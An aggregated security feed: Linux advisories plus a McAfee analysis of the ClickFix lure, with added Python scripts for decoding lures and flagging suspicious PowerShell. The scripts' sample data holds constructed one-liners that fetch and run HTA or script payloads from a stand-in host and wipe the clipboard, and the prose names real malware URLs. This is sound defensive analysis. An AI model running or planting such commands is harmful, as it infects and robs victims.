fluent-bit-3.0.4-1.fc40


FEDORA-2024-07db6333b0

Packages in this update:

fluent-bit-3.0.4-1.fc40

Update description:

Update to 3.0.4


USN-6864-3: Linux kernel (GKE) vulnerabilities


It was discovered that the Intel Data Streaming and Intel Analytics
Accelerator drivers in the Linux kernel allowed direct access to the
devices for unprivileged users and virtual machines. A local attacker could
use this to cause a denial of service. (CVE-2024-21823)

A security issue was discovered in the Linux kernel.
An attacker could possibly use it to compromise the system.
This update corrects flaws in the following subsystem:
– Netfilter;
(CVE-2024-26924)


USN-6894-1: Apport vulnerabilities


Muqing Liu and neoni discovered that Apport incorrectly handled detecting
if an executable was replaced after a crash. A local attacker could
possibly use this issue to execute arbitrary code as the root user.
(CVE-2021-3899)

Gerrit Venema discovered that Apport incorrectly handled connections to
Apport sockets inside containers. A local attacker could possibly use this
issue to connect to arbitrary sockets as the root user. (CVE-2022-1242)

Gerrit Venema discovered that Apport incorrectly handled user settings
files. A local attacker could possibly use this issue to cause Apport to
consume resources, leading to a denial of service. (CVE-2022-28652)

Gerrit Venema discovered that Apport did not limit the amount of logging
from D-Bus connections. A local attacker could possibly use this issue to
fill up the Apport log file, leading to a denial of service.
(CVE-2022-28654)

Gerrit Venema discovered that Apport did not filter D-Bus connection
strings. A local attacker could possibly use this issue to cause Apport to
make arbitrary network connections. (CVE-2022-28655)

Gerrit Venema discovered that Apport did not limit the amount of memory
being consumed during D-Bus connections. A local attacker could possibly
use this issue to cause Apport to consume memory, leading to a denial of
service. (CVE-2022-28656)

Gerrit Venema discovered that Apport did not disable the python crash
handler before chrooting into a container. A local attacker could possibly
use this issue to execute arbitrary code. (CVE-2022-28657)

Gerrit Venema discovered that Apport incorrectly handled filename argument
whitespace. A local attacker could possibly use this issue to spoof
arguments to the Apport daemon. (CVE-2022-28658)


ClickFix Deception: A Social Engineering Tactic to Deploy Malware


Yashvi Shah and Vignesh Dhatchanamoorthy

McAfee Labs has discovered a highly unusual method of malware delivery, referred to by researchers as the “Clickfix” infection chain. The attack chain begins with users being lured to visit seemingly legitimate but compromised websites. Upon visiting, victims are redirected to domains hosting fake popup windows that instruct them to paste a script into a PowerShell terminal.

The “ClickFix” infection chain represents a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts. These compromised websites are often carefully crafted to look genuine, increasing the likelihood of user compliance. Once the script is pasted and executed in the PowerShell terminal, it allows the malware to infiltrate the victim’s system, potentially leading to data theft, system compromise, or further propagation of the malware.

We have observed malware families such as Lumma Stealer and DarkGate leveraging this technique. Here is the heatmap showing the distribution of users affected by the “Clickfix” technique:

Figure 1:Prevalence for the last three months

DarkGate delivered via “ClickFix”

DarkGate is a sophisticated malware known for its ability to steal sensitive information, provide remote access, and establish persistent backdoors in compromised systems. It employs advanced evasion tactics and can spread within networks, making it a significant cybersecurity threat.
McAfee Labs obtained from its spam trap a phishing email carrying an HTML attachment.

Figure 2: Email with Attachment

The HTML file masquerades as a Word document, displaying an error prompt to deceive users. This tactic is used to trick users into taking actions that could lead to the download and execution of malicious software.

Figure 3: Fake “extension not installed” error prompt

As shown, the sample displays a message stating, “The ‘Word Online’ extension is NOT installed in your browser. To view the document offline, click the ‘How to fix’ button.”

Before clicking the button, let’s examine the underlying code. It contains several base64-encoded content blocks; the one that matters sits inside the <title> tag.

Figure 4: HTML contains Base64-encoded content in the title tag

Decoding it gives:

Figure 5: After decoding the code

The decoded command instructs PowerShell to download an HTA (HTML Application) file from https://www.rockcreekdds.com/wp-content/1[.]hta and save it locally as C:\users\public\Ix.hta.

It then launches that HTA with Start-Process, which carries out the next stage on the system. The script also runs Set-Clipboard -Value ' ' to overwrite the clipboard with a single space, so the pasted command is no longer there for the victim to inspect, and finally ends the PowerShell session with exit.

Further down the HTML page, a JavaScript block sits at the end of the code.

Figure 6: Decoding function snippet

This JavaScript snippet decodes and displays a payload, manages modal interactions for user feedback, and provides functionality for copying content to the clipboard upon user action.

In a nutshell, clicking on the “How to fix” button triggers the execution of JavaScript code that copies the PowerShell script directly onto the clipboard. This script, as previously discussed, includes commands to download and execute an HTA file from a remote server.
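The title-tag decoding walked through above, generalized into a small triage script. This is an added example, not code from the McAfee post: it pulls every long base64 run out of an HTML lure, decodes it (UTF-8 first, then UTF-16LE, which is what PowerShell's -EncodedCommand uses), recurses into any base64 found inside the decoded text (the Lumma variant later in the post nests one encoded command inside another), and reports the URLs and PowerShell indicators each blob contains. The sample HTML, the lure.example.invalid URL and the token list are constructed for the example and are not the real attachment.

```python
"""Pull base64 blobs out of a ClickFix-style HTML lure and decode them, nested levels included."""
import base64
import re

# Substrings that mark a decoded blob as a PowerShell download-and-execute one-liner
# (deliberately loose substring matching; tune the list for your own triage).
SUSPICIOUS_TOKENS = (
    "powershell", "start-process", "set-clipboard", "invoke-webrequest", "iwr ",
    "invoke-expression", "iex ", "downloadstring", "mshta", ".hta", "-w hidden",
)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
# A candidate blob is a long run of base64 alphabet with optional padding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
OPEN_TAG_RE = re.compile(r"<\s*([a-zA-Z][a-zA-Z0-9]*)[^>]*>")


def decode_b64_text(blob):
    """Decode a blob as UTF-8, falling back to UTF-16LE (the encoding of -EncodedCommand).
    Returns None when the bytes are not base64 or do not decode to printable text."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    for encoding in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in text):
            return text
    return None


def find_blobs(html):
    """Yield (enclosing_tag, blob) for every base64 candidate in the page."""
    for m in B64_RE.finditer(html):
        tags = OPEN_TAG_RE.findall(html[: m.start()])
        yield (tags[-1].lower() if tags else "?"), m.group(0)


def analyze_lure(html, max_depth=3):
    """Decode every blob, recurse into blobs found inside decoded text, and report
    the URLs and suspicious tokens each one contains."""
    findings = []
    pending = [(tag, blob, 0) for tag, blob in find_blobs(html)]
    while pending:
        tag, blob, depth = pending.pop()
        text = decode_b64_text(blob)
        if text is None:
            continue
        low = text.lower()
        findings.append({
            "tag": tag,
            "depth": depth,
            "urls": URL_RE.findall(text),
            "tokens": sorted({t.strip() for t in SUSPICIOUS_TOKENS if t in low}),
            "decoded": text,
        })
        if depth < max_depth:
            pending.extend((tag, inner, depth + 1) for inner in B64_RE.findall(text))
    return findings


# Constructed sample in the shape of the lure described above (not the real attachment):
# the <title> carries a base64 PowerShell one-liner and the script copies it to the clipboard.
_INNER_CMD = r'''powershell -w hidden -c "iwr http://lure.example.invalid/1.hta -OutFile C:\users\public\x.hta; Start-Process C:\users\public\x.hta; Set-Clipboard -Value ' '; exit"'''
SAMPLE_HTML = (
    "<html><head><title>" + base64.b64encode(_INNER_CMD.encode()).decode() + "</title></head>"
    "<body><p>The 'Word Online' extension is NOT installed in your browser. "
    "To view the document offline, click the 'How to fix' button.</p>"
    "<script>var payload=document.title;"
    "function fix(){navigator.clipboard.writeText(atob(payload));}</script>"
    "</body></html>"
)
# Blob used only to exercise the UTF-16LE fallback (constructed).
SAMPLE_UTF16_BLOB = base64.b64encode("hi there".encode("utf-16-le")).decode()

if __name__ == "__main__":
    for f in analyze_lure(SAMPLE_HTML):
        print(f"[{f['tag']}] depth={f['depth']} urls={f['urls']} tokens={f['tokens']}")
        print("  " + f["decoded"])
```

Run it against a saved attachment with `analyze_lure(open("lure.html", encoding="utf-8", errors="replace").read())`; a blob inside `<title>` that decodes to a URL plus Start-Process or Set-Clipboard is the signature described in this post.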

Let’s delve into it practically:

Figure 7: Clipboard contains malicious command

The lure then tells the victim to press Windows+R (which opens the Run dialog) and CTRL+V (which pastes the clipboard contents), and to run what appears. Because the page’s JavaScript has already placed the PowerShell one-liner on the clipboard, the victim launches the download-and-execute command themselves, without ever seeing what it does.

Once the user does this, the HTA file gets downloaded.

Figure 8: HTA code snippet

The HTA connects to the marked domain and executes a PowerShell script fetched from it. The remotely hosted script that it runs is shown below.

Figure 9: Powershell code snippet

This PowerShell script runs without any further user interaction: it creates a folder on the C: drive, drops an AutoIt executable and script into it, and runs them.

Figure 10: Downloaded zip contains AutoIT script

Following this, DarkGate begins its malicious activity and starts communicating with its command and control (C2) server.

A similar Clickfix social engineering technique was found to be dropping Lumma Stealer.

Lumma Stealer delivered via “ClickFix”

McAfee Labs discovered a website displaying an error message indicating that the browser is encountering issues displaying the webpage. The site provides steps to fix the problem, which are designed to deceive users into executing malicious actions.

Figure 11: Showing error on accessing the webpage

It directs the target user to perform the following steps:

Click on the “Copy Fix” button.
Right-click on the Windows icon.
Open Windows PowerShell (Admin).
Right-click within the open terminal window (in the Windows console a right-click pastes the clipboard contents, so this drops the copied command into an elevated shell).
Wait for the update to complete.

Let’s analyze the code that gets copied when clicking the “Copy Fix” button.

Figure 12: Base64-encoded content

As we can see, the code includes base64-encoded content. Decoding this content, we get the following script:

Figure 13: After decoding the Base64 content

This PowerShell script flushes the DNS cache, then decodes a base64-encoded command that fetches a script from https://weoleycastletaxis.co.uk/chao/baby/cow[.]html with a specific User-Agent header and executes it. It then clears the screen to hide what just happened, and decodes a second base64 string that sets the clipboard to a single space, again removing the pasted command from the clipboard. The whole sequence is built to download and run remote code while leaving as little as possible on the screen or the clipboard for the user to notice.

Upon execution, the following process tree is observed:

Figure 14: Process Tree
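Detection logic for the process tree above, as an added example rather than anything from the McAfee post. It scores two kinds of constructed endpoint records: process-creation events in the shape of Sysmon Event ID 1 (the DarkGate path, where Win+R makes explorer.exe the parent of the PowerShell process and the whole one-liner lands on the command line) and PowerShell script-block records in the shape of Event ID 4104 (the Lumma path, where the victim pastes into an already-open console, so no new process is created and the command line carries nothing). Field names, weights, the alert threshold and the lure.example.invalid URLs are assumptions made for the example.

```python
"""Score endpoint telemetry for the ClickFix execution pattern: a shell launched from the
Run dialog, or text pasted into a console, that fetches remote code, runs it, then wipes
the clipboard. Constructed example; field names mirror Sysmon EID 1 / PowerShell EID 4104."""
import base64
import re

# (pattern over the command text, weight, label); weights are illustrative.
INDICATORS = [
    (re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), 2, "hidden window"),
    (re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I), 2, "remote fetch"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2, "in-memory execution"),
    (re.compile(r"\bset-clipboard\b", re.I), 3, "clipboard wiped"),
    (re.compile(r"\b(?:mshta(?:\.exe)?|start-process)\b[^\r\n]*\.hta\b", re.I), 3, "HTA launched"),
    (re.compile(r"\bipconfig\s+/flushdns\b", re.I), 1, "DNS cache flushed"),
    (re.compile(r"\b(?:cls|clear-host)\b", re.I), 1, "console cleared"),
    (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I), 2, "encoded command"),
]
ENC_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
SHELLS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
ALERT_THRESHOLD = 5


def expand_encoded(cmd):
    """Append the decoded -EncodedCommand payload (UTF-16LE) so indicators can inspect it."""
    m = ENC_RE.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + "\n" + base64.b64decode(m.group(1)).decode("utf-16-le", "ignore")
    except ValueError:
        return cmd


def score_text(text):
    """Return (score, labels) for one command line or script block."""
    text = expand_encoded(text)
    score, labels = 0, []
    for rx, weight, label in INDICATORS:
        if rx.search(text):
            score += weight
            labels.append(label)
    return score, labels


def score_event(ev):
    """'process' events: only shells count, and a parent of explorer.exe (Run dialog) adds
    weight. 'scriptblock' events are the only place a command pasted into an already-open
    console shows up, because the paste creates no new process."""
    if ev["kind"] == "process":
        image = ev["Image"].lower().rsplit("\\", 1)[-1]
        if image not in SHELLS:
            return 0, []
        score, labels = score_text(ev["CommandLine"])
        if ev.get("ParentImage", "").lower().endswith("\\explorer.exe"):
            score += 2
            labels.append("spawned by explorer.exe (Run dialog)")
        return score, labels
    if ev["kind"] == "scriptblock":
        return score_text(ev["ScriptBlockText"])
    return 0, []


def triage(events):
    """Return [(event id, score, labels)] for events at or above ALERT_THRESHOLD."""
    alerts = []
    for ev in events:
        score, labels = score_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append((ev["id"], score, labels))
    return alerts


PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
# The same kind of one-liner hidden behind -EncodedCommand (constructed).
_ENC = base64.b64encode(
    r"Set-Clipboard -Value ' '; iwr http://lure.example.invalid/a.hta -OutFile $env:TEMP\a.hta; mshta $env:TEMP\a.hta".encode("utf-16-le")
).decode()

# Constructed sample events: e1 and e4 are the Win+R path, e2 is the paste-into-console
# path, e3 is a benign script launched from Explorer and must stay below the threshold.
SAMPLE_EVENTS = [
    {"id": "e1", "kind": "process", "ParentImage": EXPLORER, "Image": PS_EXE,
     "CommandLine": r'''powershell -w hidden -c "iwr http://lure.example.invalid/1.hta -OutFile C:\users\public\x.hta; Start-Process C:\users\public\x.hta; Set-Clipboard -Value ' '"'''},
    {"id": "e2", "kind": "scriptblock",
     "ScriptBlockText": r"""ipconfig /flushdns; iex (iwr -Uri http://lure.example.invalid/cow.html -UseBasicParsing -Headers @{"User-Agent"="Mozilla/5.0"}).Content; cls; Set-Clipboard -Value ' '"""},
    {"id": "e3", "kind": "process", "ParentImage": EXPLORER, "Image": PS_EXE,
     "CommandLine": r"powershell -NoProfile -File C:\scripts\backup.ps1"},
    {"id": "e4", "kind": "process", "ParentImage": EXPLORER, "Image": PS_EXE,
     "CommandLine": "powershell -nop -w hidden -enc " + _ENC},
]

if __name__ == "__main__":
    for event_id, score, labels in triage(SAMPLE_EVENTS):
        print(f"{event_id}: score={score} {labels}")
```

The script-block case is the one that matters for the “Copy Fix” variant: with script block logging off, the pasted command leaves no command-line record at all, and the only traces are its network and file side effects.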

The fetched script downloads the malware from the URL above: a new folder is created under the Temp directory and a zip is downloaded into it:

Figure 15: Network activity

The malware is unzipped and dropped in the same folder:

Figure 16: Dropped files

The malware starts communicating with its C2 server as soon as it gets dropped in the targeted system.

Conclusion:

The ClickFix social engineering technique is an effective method of malware deployment that needs no exploit: the victim executes the command themselves. By embedding base64-encoded scripts in seemingly legitimate error prompts, attackers talk users through a sequence of actions that ends with the user running a malicious PowerShell command. That command downloads and executes a payload, such as an HTA file, from a remote server, which in turn deploys malware like DarkGate or Lumma Stealer.

Once the malware is active on the system, it begins stealing the user’s personal data and sending it to its command and control (C2) server. The scripts also take steps to evade notice and maintain persistence, such as clearing the clipboard and running processes in minimized windows. By disguising the lure as an error message with helpful-looking instructions, attackers get users to run harmful scripts that download and execute malware without realising it.

Mitigations:

At McAfee Labs, we are committed to helping organizations protect themselves against sophisticated cyber threats, such as the Clickfix social engineering technique. Here are our recommended mitigations and remediations:

Conduct regular training sessions to educate users about social engineering tactics and phishing schemes.
Install and maintain updated antivirus and anti-malware software on all endpoints.
Implement robust email filtering to block phishing emails and malicious attachments.
Use web filtering solutions to prevent access to known malicious websites.
Deploy firewalls and intrusion detection/prevention systems (IDS/IPS) to monitor and block malicious network traffic.
Use network segmentation to limit the spread of malware within the organization.
Enforce the principle of least privilege (PoLP) to minimize user access to only necessary resources.
Implement security policies to monitor and restrict clipboard usage, especially in sensitive environments.
Implement multi-factor authentication (MFA) for accessing sensitive systems and data.
Ensure all operating systems, software, and applications are kept up to date with the latest security patches.
Continuously monitor and analyze system and network logs for signs of compromise.
Encrypt sensitive data both in transit and at rest to protect it from unauthorized access.
Regularly back up important data and store backups securely to ensure data recovery in case of a ransomware attack or data breach.

Indicators of Compromise (IoCs)

Type           Indicator (SHA256 unless noted)

DarkGate

Email          c5545d28faee14ed94d650bda28124743e2d7dacdefc8bf4ec5fc76f61756df3
HTML           0db16db812cb9a43d5946911501ee8c0f1e3249fb6a5e45ae11cef0dddbe4889
HTA            5c204217d48f2565990dfdf2269c26113bd14c204484d8f466fb873312da80cf
PowerShell     e9ad648589aa3e15ce61c6a3be4fc98429581be738792ed17a713b4980c9a4a2
ZIP            8c382d51459b91b7f74b23fbad7dd2e8c818961561603c8f6614edc9bb1637d1
AutoIT script  7d8a4aa184eb350f4be8706afb0d7527fca40c4667ab0491217b9e1e9d0f9c81

Lumma Stealer

URL (domain)   tuchinehd[.]com
PowerShell     07594ba29d456e140a171cba12d8d9a2db8405755b81da063a425b1a8b50d073
ZIP            6608aeae3695b739311a47c63358d0f9dbe5710bd0073042629f8d9c1df905a8
EXE            e60d911f2ef120ed782449f1136c23ddf0c1c81f7479c5ce31ed6dcea6f6adf9


The post ClickFix Deception: A Social Engineering Tactic to Deploy Malware appeared first on McAfee Blog.


USN-6893-1: Linux kernel vulnerabilities


It was discovered that a race condition existed in the Bluetooth subsystem
in the Linux kernel when modifying certain settings values through debugfs.
A privileged local attacker could use this to cause a denial of service.
(CVE-2024-24857, CVE-2024-24858, CVE-2024-24859)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
– ARM64 architecture;
– RISC-V architecture;
– S390 architecture;
– x86 architecture;
– Block layer subsystem;
– Compute Acceleration Framework;
– Accessibility subsystem;
– Android drivers;
– Drivers core;
– Bluetooth drivers;
– Clock framework and drivers;
– Data acquisition framework and drivers;
– Cryptographic API;
– Buffer Sharing and Synchronization framework;
– GPU drivers;
– On-Chip Interconnect management framework;
– IOMMU subsystem;
– Multiple devices driver;
– Media drivers;
– VMware VMCI Driver;
– Network drivers;
– Microsoft Azure Network Adapter (MANA) driver;
– Device tree and open firmware driver;
– Chrome hardware platform drivers;
– i.MX PM domains;
– TI SCI PM domains driver;
– S/390 drivers;
– SCSI drivers;
– SPI subsystem;
– Thermal drivers;
– TTY drivers;
– USB subsystem;
– Framebuffer layer;
– BTRFS file system;
– Network file system server daemon;
– NILFS2 file system;
– File systems infrastructure;
– Pstore file system;
– SMB network file system;
– BPF subsystem;
– Bluetooth subsystem;
– Netfilter;
– io_uring subsystem;
– Core kernel;
– Extra boot config (XBC);
– Memory management;
– Amateur Radio drivers;
– B.A.T.M.A.N. meshing protocol;
– Ethernet bridge;
– Networking core;
– IPv4 networking;
– IPv6 networking;
– Multipath TCP;
– NFC subsystem;
– RDS protocol;
– Network traffic control;
– SMC sockets;
– Sun RPC protocol;
– TLS protocol;
– Unix domain sockets;
– Wireless networking;
– eXpress Data Path;
– SELinux security module;
(CVE-2024-35967, CVE-2024-35886, CVE-2024-26999, CVE-2024-27008,
CVE-2024-26988, CVE-2024-35980, CVE-2024-26982, CVE-2024-35946,
CVE-2024-35918, CVE-2024-27015, CVE-2024-35900, CVE-2024-35942,
CVE-2024-35879, CVE-2024-35961, CVE-2024-35944, CVE-2024-35934,
CVE-2024-35978, CVE-2024-35938, CVE-2024-27003, CVE-2024-35976,
CVE-2024-36019, CVE-2024-35880, CVE-2024-35866, CVE-2024-35929,
CVE-2024-35917, CVE-2024-35912, CVE-2024-35896, CVE-2024-26986,
CVE-2024-35951, CVE-2024-35958, CVE-2024-26997, CVE-2024-35965,
CVE-2024-35953, CVE-2024-26993, CVE-2024-26991, CVE-2024-35892,
CVE-2024-36026, CVE-2024-35882, CVE-2024-35964, CVE-2024-35865,
CVE-2024-35897, CVE-2024-26981, CVE-2024-35872, CVE-2024-36027,
CVE-2024-26983, CVE-2024-35909, CVE-2024-35985, CVE-2024-35875,
CVE-2024-35890, CVE-2024-26922, CVE-2024-26994, CVE-2024-35903,
CVE-2024-35936, CVE-2024-35904, CVE-2024-27013, CVE-2024-36025,
CVE-2024-26980, CVE-2024-27006, CVE-2024-35861, CVE-2024-35864,
CVE-2024-27018, CVE-2024-36022, CVE-2024-26990, CVE-2024-35968,
CVE-2024-35860, CVE-2024-36024, CVE-2024-35933, CVE-2024-27019,
CVE-2024-35925, CVE-2024-35950, CVE-2024-35915, CVE-2024-35916,
CVE-2024-35956, CVE-2024-36020, CVE-2024-35873, CVE-2024-27002,
CVE-2024-35963, CVE-2024-35959, CVE-2024-35937, CVE-2024-27011,
CVE-2024-27020, CVE-2024-35883, CVE-2024-35913, CVE-2024-35910,
CVE-2024-27021, CVE-2024-35921, CVE-2024-35905, CVE-2024-27010,
CVE-2024-35981, CVE-2024-35885, CVE-2024-35955, CVE-2024-35894,
CVE-2024-35969, CVE-2024-36018, CVE-2024-35867, CVE-2024-27007,
CVE-2024-35908, CVE-2024-26985, CVE-2024-27016, CVE-2024-35960,
CVE-2024-35935, CVE-2024-35932, CVE-2024-35957, CVE-2024-27001,
CVE-2024-35871, CVE-2024-35907, CVE-2024-35878, CVE-2024-35979,
CVE-2024-35972, CVE-2024-35975, CVE-2024-35877, CVE-2024-35926,
CVE-2024-26817, CVE-2024-35899, CVE-2024-27004, CVE-2024-35920,
CVE-2024-35924, CVE-2024-35977, CVE-2024-35930, CVE-2024-35911,
CVE-2024-26996, CVE-2024-27005, CVE-2024-35870, CVE-2024-35982,
CVE-2024-35895, CVE-2024-35943, CVE-2024-35902, CVE-2024-35919,
CVE-2024-35973, CVE-2024-35931, CVE-2024-35888, CVE-2024-35914,
CVE-2024-35970, CVE-2024-36023, CVE-2024-27012, CVE-2024-35939,
CVE-2024-26984, CVE-2024-35884, CVE-2024-35901, CVE-2024-26811,
CVE-2024-35966, CVE-2024-35891, CVE-2024-35887, CVE-2024-35945,
CVE-2024-35971, CVE-2024-35862, CVE-2024-26987, CVE-2024-26921,
CVE-2024-26989, CVE-2024-35952, CVE-2024-27009, CVE-2024-35893,
CVE-2024-26995, CVE-2024-26925, CVE-2024-35868, CVE-2024-35954,
CVE-2024-35922, CVE-2024-27000, CVE-2024-36021, CVE-2024-27014,
CVE-2024-35940, CVE-2024-26992, CVE-2024-26926, CVE-2024-35927,
CVE-2024-35863, CVE-2024-27022, CVE-2024-26998, CVE-2024-27017,
CVE-2024-26928, CVE-2024-35889, CVE-2024-35898, CVE-2024-35869,
CVE-2024-26936, CVE-2024-26923, CVE-2023-52699, CVE-2024-35974)


USN-6885-2: Apache HTTP Server regression


USN-6885-1 fixed vulnerabilities in Apache HTTP Server. One of the security
fixes introduced a regression when proxying requests to an HTTP/2 server.
This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

Marc Stern discovered that the Apache HTTP Server incorrectly handled
serving WebSocket protocol upgrades over HTTP/2 connections. A remote
attacker could possibly use this issue to cause the server to crash,
resulting in a denial of service. (CVE-2024-36387)

Orange Tsai discovered that the Apache HTTP Server mod_proxy module
incorrectly sent certain request URLs with incorrect encodings to backends.
A remote attacker could possibly use this issue to bypass authentication.
(CVE-2024-38473)

Orange Tsai discovered that the Apache HTTP Server mod_rewrite module
incorrectly handled certain substitutions. A remote attacker could possibly
use this issue to execute scripts in directories not directly reachable
by any URL, or cause a denial of service. Some environments may require
using the new UnsafeAllow3F flag to handle unsafe substitutions.
(CVE-2024-38474, CVE-2024-38475, CVE-2024-39573)

Orange Tsai discovered that the Apache HTTP Server incorrectly handled
certain response headers. A remote attacker could possibly use this issue
to obtain sensitive information, execute local scripts, or perform SSRF
attacks. (CVE-2024-38476)

Orange Tsai discovered that the Apache HTTP Server mod_proxy module
incorrectly handled certain requests. A remote attacker could possibly use
this issue to cause the server to crash, resulting in a denial of service.
(CVE-2024-38477)

It was discovered that the Apache HTTP Server incorrectly handled certain
handlers configured via AddType. A remote attacker could possibly use this
issue to obtain source code. (CVE-2024-39884)
